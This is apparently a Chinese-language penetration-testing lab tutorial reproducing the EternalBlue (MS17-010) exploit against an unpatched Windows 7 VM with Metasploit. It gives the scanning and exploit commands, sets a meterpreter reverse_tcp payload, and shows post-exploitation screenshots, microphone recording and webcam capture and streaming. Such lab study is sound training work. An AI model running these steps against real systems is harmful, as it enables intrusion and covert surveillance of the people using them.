WIN7系统永恒之蓝漏洞
前章:
安全漏洞的分析与利用
PTES渗透测试执行标准
1.简介
永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 // 该词条来自于百度百科
2.漏洞复现
平台搭建-环境部署:
- 基于vmware workstation 12 pro
- kali linux
- window 7 x64位 (未打MS17-010补丁)
- kali linux与win7靶机在同一网段
(1).漏洞信息收集
首先,进入Metasploit的msf终端
msf终端是Metasploit框架中最强大、最丰富且支持最好的用户接口
- 使用Metasploit自带的nmap工具对靶机进行扫描
我们发现其主机的445端口是打开的,可能存在永恒之蓝漏洞。 - 使用AUX辅助模块,扫描目标靶机
当前使用的为auxiliary(scanner/portscan/tcp)
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.129
RHOSTS => 10.10.10.129
msf5 auxiliary(scanner/portscan/tcp) > set ports 1-1000
ports => 1-1000
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > exploit
我们可以看到我们针对于10.10.10.129主机1-1000端口,TCP的135、139、445端口都打开
(2).渗透攻击阶段
- 使用ms17-010模块
- 使用ms17-010的aux模块再次对10.10.10.129主机进行扫描,发现该主机445端口很可能通过MS17-010进行攻击
使用ms17-010 exploit攻击模块进行攻击
攻击成功,进入windows系统,且权限为最高系统权限system32>
(3).后渗透攻击阶段
- 设置攻击载荷(payloads)
当前使用的为 windows/x64/meterpreter/reverse_tcp
- 攻击成功后,我们会进入到meterpreter后门工具中
merterpreter: 可以看做一个支持多操作系统平台,可以驻留在内存中并具备免杀功能的高级后门程序。
meterpreter的功能:
- 1.特权提升
- 2.信息获取
- 3.系统监控
- 4.跳板攻击
- 5.内网拓展等
- 接下来我们针对于129主机,进行后渗透中的截屏和系统监控及录音的获取
screenshot - 截屏
meterpreter > screenshot //截屏,默认存储在家目录下
Screenshot saved to: /root/bnalpAZM.jpeg
meterpreter > screenshot -h
Usage: screenshot [options]
Grab a screenshot of the current interactive desktop.
OPTIONS:
-h Help Banner.
-p <opt> The JPEG image path (Default: 'gjFcDUjx.jpeg') //定义截屏存储路径
-q <opt> The JPEG image quality (Default: '50') //定义像素
-v <opt> Automatically view the JPEG image (Default: 'false') //自动查看截屏、默认关闭
meterpreter >
record_mic录音
meterpreter > record_mic -d 3 -p false
[*] Starting...
[*] Stopped
Audio saved to: /root/UOzQKTfF.wav
meterpreter >
meterpreter > record_mic -h
Usage: record_mic [options]
Records audio from the default microphone.
OPTIONS:
-d <opt> Number of seconds to record (Default: 1) //定义录音时间长短,默认为1秒
-f <opt> The wav file path (Default: '/root/[randomname].wav') //定义录音文件存储路径,默认为家目录下
-h Help Banner
-p <opt> Automatically play the captured audio (Default: 'true') //自动播放捕获的音频
meterpreter >
meterpreter中的Webcam commands-摄像头命令
- webcam_chat:开始一个视频聊天
- webcam_list:扫描摄像头设备
- webcam_snap:从指定的摄像头获取快照
- webcam_stream:从指定的摄像头播放视频流
meterpreter > webcam_list
1: USB2.0 VGA UVC WebCam
扫描摄像头设备:
拍取快照,抓拍摄像头:
meterpreter > webcam_snap -p /root/snap.jpeg -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/snap.jpeg
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.
OPTIONS:
-h Help Banner
-i <opt> The index of the webcam to use (Default: 1) //摄像头索引
-p <opt> The JPEG image path (Default: 'McrshoXs.jpeg') //快照存储路径
-q <opt> The JPEG image quality (Default: '50') //像素默认50
-v <opt> Automatically view the JPEG image (Default: 'true') //默认自动打开快照
从摄像头中截取的快照图片
打开视频监控:
meterpreter > webcam_stream -h
[*] Starting...
Usage: webcam_stream [options]
Stream from the specified webcam.
OPTIONS:
-d <opt> The stream duration in seconds (Default: 1800) //视频流持续时间,默认1800秒
-h Help Banner
-i <opt> The index of the webcam to use (Default: 1) //摄像头索引
-q <opt> The stream quality (Default: '50') //视频流像素
-s <opt> The stream file path (Default: 'YCKFILwE.jpeg') //视频流存储路径
-t <opt> The stream player path (Default: gZAbKWbt.html) // 视频流访问路径
-v <opt> Automatically view the stream (Default: 'true') // 自动打开视频,默认开启
meterpreter >